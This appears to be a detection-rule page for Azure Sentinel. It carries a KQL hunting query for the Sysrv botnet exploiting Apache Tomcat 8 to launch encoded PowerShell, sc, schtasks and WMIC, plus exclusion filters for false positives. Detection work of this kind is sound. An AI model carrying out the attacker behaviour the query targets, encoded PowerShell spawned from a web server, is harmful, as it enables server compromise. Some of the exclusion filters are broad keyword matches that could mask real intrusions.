tomcat-8-executing-powershell

Hunt Hypothesis

The hypothesis is that the detection identifies a Sysrv botnet command and control activity where PowerShell is executed to exfiltrate data or execute malicious payloads on compromised Windows servers. SOC teams should proactively hunt for this behavior in Azure Sentinel to detect and mitigate Sysrv botnet infections early, preventing resource theft and cryptocurrency mining activities.

KQL Query

DeviceProcessEvents
| where InitiatingProcessParentFileName startswith 'tomcat'
| where InitiatingProcessFileName in~("cmd.exe", "powershell.exe") and InitiatingProcessCommandLine hasprefix '-enc '
and ProcessCommandLine has_any ('cmd.exe','powershell.exe','sc.exe','schtasks.exe','WMIC.exe')

Analytic Rule Definition

id: eb5c922d-37f2-4790-9fa2-efd113c0f6d9
name: tomcat-8-executing-powershell
description: |
  This query was originally published in the threat analytics report, Sysrv botnet evolution.
  Sysrv is a Go-based botnet that targets both Windows and Linux servers, and steals resources to mine cryptocurrency.
  The following query finds instances of Apache Tomcat 8 being exploited to execute encoded PowerShell commands.
requiredDataConnectors:
- connectorId: MicrosoftThreatProtection
  dataTypes:
  - DeviceProcessEvents
query: |
  DeviceProcessEvents
  | where InitiatingProcessParentFileName startswith 'tomcat'
  | where InitiatingProcessFileName in~("cmd.exe", "powershell.exe") and InitiatingProcessCommandLine hasprefix '-enc '
  and ProcessCommandLine has_any ('cmd.exe','powershell.exe','sc.exe','schtasks.exe','WMIC.exe')

Required Data Sources

Sentinel Table	Notes
`DeviceProcessEvents`	Ensure this data connector is enabled

References

[Source Query](https://github.com/Azure/Azure-Sentinel/blob/main/Hunting Queries/Microsoft 365 Defender/Campaigns/Sysrv-botnet/tomcat-8-executing-powershell.yaml)

False Positive Guidance

Scenario: Scheduled PowerShell Task for System Maintenance
Description: A legitimate scheduled task runs PowerShell to perform system maintenance, such as disk cleanup or log rotation.
Filter/Exclusion: process.parent_process_name:"Task Scheduler" or process.command_line:*Cleanup* or process.command_line:*Logrotate*
Scenario: Admin Using PowerShell for Configuration Management
Description: An administrator uses PowerShell to configure Tomcat settings, such as updating the server.xml or deploying a WAR file.
Filter/Exclusion: process.command_line:*server.xml* or process.command_line:*deploy* or process.user:*admin*
Scenario: PowerShell Script for Monitoring and Logging
Description: A monitoring tool like PRTG or Nagios uses PowerShell scripts to collect metrics from Tomcat.
Filter/Exclusion: process.command_line:*PRTG* or process.command_line:*Nagios* or process.command_line:*Collect-Stats*
Scenario: PowerShell-Based Backup Job
Description: A backup job using Veeam or Commvault runs PowerShell scripts to back up Tomcat configuration files.
Filter/Exclusion: process.command_line:*Veeam* or process.command_line:*Commvault* or process.command_line:*Backup-Tomcat*
Scenario: PowerShell Module for Application Deployment
Description: A deployment tool like Octopus Deploy or Chef uses PowerShell modules to deploy applications to Tomcat.
Filter/Exclusion: process.command_line:*Octopus* or process.command_line:*Chef* or process.command_line:*Deploy-Application*